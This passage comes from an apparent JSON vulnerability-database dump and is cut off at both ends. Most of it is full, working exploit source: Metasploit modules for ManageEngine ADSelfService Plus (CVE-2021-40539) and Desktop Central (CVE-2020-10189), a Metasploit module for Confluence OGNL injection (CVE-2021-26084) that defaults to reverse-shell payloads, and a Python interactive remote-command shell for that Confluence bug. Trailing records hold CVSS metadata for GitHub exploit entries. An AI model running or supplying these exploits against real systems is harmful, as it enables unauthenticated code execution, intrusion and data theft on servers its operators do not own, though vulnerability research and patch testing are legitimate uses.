"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T05:12:51", "description": "", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "PACKETSTORM:164122", "href": "https://packetstormsecurity.com/files/164122/Atlassian-Confluence-WebWork-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence WebWork OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence's \nWebWork component to execute commands as the Tomcat user. \n}, \n'Author' => [ \n'Benny Jacob', # Discovery \n'Jang', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'], \n['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'], \n['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'], \n['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'], \n['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6'] \n], \n'DisclosureDate' => '2021-08-25', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Tomcat user \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \n# /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log \n# /var/atlassian/application-data/confluence/logs/atlassian-confluence.log \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \ntoken1 = rand_text_alphanumeric(8..16) \ntoken2 = rand_text_alphanumeric(8..16) \ntoken3 = rand_text_alphanumeric(8..16) \n \nres = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\") \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\") \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nres = inject_ognl(ognl_payload(cmd)) \n \nunless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef inject_ognl(ognl) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'), \n'vars_post' => { \n# https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html \n# https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341 \n'queryString' => Rex::Text.to_hex(ognl, '\\\\u00') \n} \n) \nend \n \ndef ognl_payload(cmd) \n# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution \n# https://www.tutorialspoint.com/java/lang/class_forname_loader.htm \n# https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html \n# https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n'+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(' \nnew java.lang.ProcessBuilder( \n\"/bin/bash\", \n\"-c\", \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n).start() \n')+' \nOGNL \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164122/atlassian_confluence_webwork_ognl_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-01T15:58:38", "description": "", "cvss3": {}, "published": "2021-09-01T00:00:00", "type": "packetstorm", "title": "Confluence Server 7.12.4 OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "PACKETSTORM:164013", "href": "https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) \n# Date: 01/09/2021 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.12.x versions before 7.12.5 \n# Tested on: Linux Distros \n# CVE : CVE-2021-26084 \n \n#!/usr/bin/python3 \n \n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html \n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md \n \nimport requests \nfrom bs4 import BeautifulSoup \nimport optparse \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\") \nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\") \n \noptions, args = parser.parse_args() \nsession = requests.Session() \n \nurl_vuln = options.url \nendpoint = options.path \n \nif not options.url or not options.path: \n \nprint('[+] Specify an url target') \nprint('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') \nprint('[+] Example help usage: exploit.py -h') \nexit() \n \n \ndef banner(): \n \nprint('---------------------------------------------------------------') \nprint('[-] Confluence Server Webwork OGNL injection') \nprint('[-] CVE-2021-26084') \nprint('[-] https://github.com/h3v0x') \nprint('--------------------------------------------------------------- \\n') \n \n \ndef cmdExec(): \n \nwhile True: \ncmd = input('> ') \nxpl_url = url_vuln + endpoint \nxpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"} \nxpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"} \nrawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) \n \nsoup = BeautifulSoup(rawHTML.text, 'html.parser') \nqueryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-05-01T13:10:07", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-04-30T15:43:07", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:40", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:31", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-27T09:24:07", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:43", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 